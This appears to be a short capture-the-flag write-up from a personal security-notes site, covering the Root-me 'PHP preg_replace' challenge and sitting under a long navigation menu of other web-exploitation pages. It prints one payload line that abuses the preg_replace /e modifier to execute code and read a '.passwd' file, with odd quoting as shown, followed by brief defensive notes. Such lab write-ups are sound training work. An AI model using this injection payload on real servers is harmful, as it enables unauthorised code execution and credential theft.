Skip to content
logo
Red tradecraft
PHP preg_replace
  • Privacy greenhouse
  • Defence blues
  • Purple crossroads
  • Indigo observatory
  • Contact
Initializing search
    • In: Where the falcons and foxes roam
      • A canopy of apple-blossom
        • Field notes from the fragrant branches of web app exploitation
        • Web application attack runbooks
        • Web application attack playbooks
        • Root-me: Orchard foraging
          • Root-Me Web client challenges
          • Root-Me Web server challenges
            • Insecure code management
            • Directory traversal
            • File upload: null byte
            • PHP assert()
            • PHP Filters
            • PHP Register globals
            • JWT Introduction
            • JWT (not) revoked token
            • JWT weak secret
            • Python: Server-side Template Injection Introduction
            • Command injection: filter bypass
            • Java: Server-side Template Injection (SSTI)
            • Local file inclusion
            • Local file inclusion: double encoding
            • PHP preg_replace
              • Techniques
              • Counter moves
            • PHP type juggling
            • SQL injection: authentication
            • SQL injection: string
            • XSLT code execution
            • PHP path truncation
            • PHP serialisation
            • SQL injection: numeric
            • SQL injection: routed
            • SQL truncation
            • XPath injection: authentication
            • SQL injection: time-based
      • Social engineering
      • Where wild boars plough through endpoints
      • Wolverines do not ask for permissions
      • Riches in the ground
      • The device is just the keyring
      • Poking physics with network packets
    • Through: Where the raccoons burrow and rummage
    • Out: Where squirrels swipe the crown jewels
    • Fungolia earthworks
    • Unseen University Power & Light Co.
    • The Scarlet Semaphore
    • Techniques
    • Counter moves

    PHP preg_replace¶

    root-me challenge PHP - preg_replace(): Read flag.php.

    Using HackTricks Code execution using preg_replace():

    preg_replace("/a/e","file_get_contents(".passwd")","whatever")

    Techniques¶

    • Remote code execution (RCE)

    • Server-side injection runbook

    Counter moves¶

    PHP preg_replace is the variant in play. Server-side validation and least privilege are what these reduce to. The defender’s view can be found in the blue notes on the application layer as a target.

    2026-06-14 18:23
    © Copyright 2025, TyMyrddin.
    Created using Sphinx 7.2.6. and Sphinx-Immaterial

    Made with love in the Unseen University, 2025, with a forest garden fostered by /ut7